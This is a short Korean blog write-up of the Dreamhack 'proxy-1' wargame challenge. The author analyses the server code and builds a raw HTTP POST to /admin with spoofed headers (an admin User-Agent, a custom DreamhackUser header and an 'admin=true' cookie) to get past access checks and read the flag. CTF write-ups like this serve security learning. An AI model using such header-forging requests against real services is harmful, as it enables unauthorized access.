Iriton's log
[Dreamhack/Wargame] Lv.1 proxy-1 본문
사이트 분석
host, port, data를 POST 하는 구조인 거 같다.
127.0.0.1 / 8000 / Hello 를 입력했더니 에러가 뜬다.
코드 분석
20. elif 문을 보면 클라이언트 측 메서드가 POST라면, 앞서 살펴본 페이지에서 입력한 값들을 host, port, data에 저장한다.
/admin 에서는 조건문에 걸리지 않으면 FLAG 값을 띄운다.
즉, 조건문에 해당하지 않는 값을 전달해야 한다.
/socket 을 통해서 입력한 data를 보내주니, 여기로 조건문을 고려한 값을 전달해야 한다.
참고 사이트:
https://developer.mozilla.org/ko/docs/Web/HTTP/Methods/POST
POST - HTTP | MDN
HTTP POST 메서드는 서버로 데이터를 전송합니다. 요청 본문의 유형은 Content-Type 헤더로 나타냅니다.
developer.mozilla.org
위 사이트에 따르면 data에 입력해야 할 코드는 다음과 같다.
POST /admin HTTP/1.1
Host: host1.dreamhack.games:23907
Content-Length: 12
Content-Type: application/x-www-form-urlencoded
User-Agent: Admin Browser
DreamhackUser: admin
Cookie: admin=true
Connection: close
userid=admin
'WebHacking > WarGame' 카테고리의 다른 글
| [Dreamhack/Wargame] Lv.1 simple-web-request write-up (0) | 2023.05.30 |
|---|---|
| [Dreamhack/Wargame] Lv.1 ex-reg-ex write-up (0) | 2023.05.30 |
| [Dreamhack/Wargame] Lv.1 simple-ssti (0) | 2023.05.17 |
| [Suninatas] Web.01 write-up (0) | 2023.05.11 |
| [Dreamhack] dreamhack-tools-cyberchef write-up (0) | 2023.05.11 |
'WebHacking/WarGame' Related Articles
more
Comments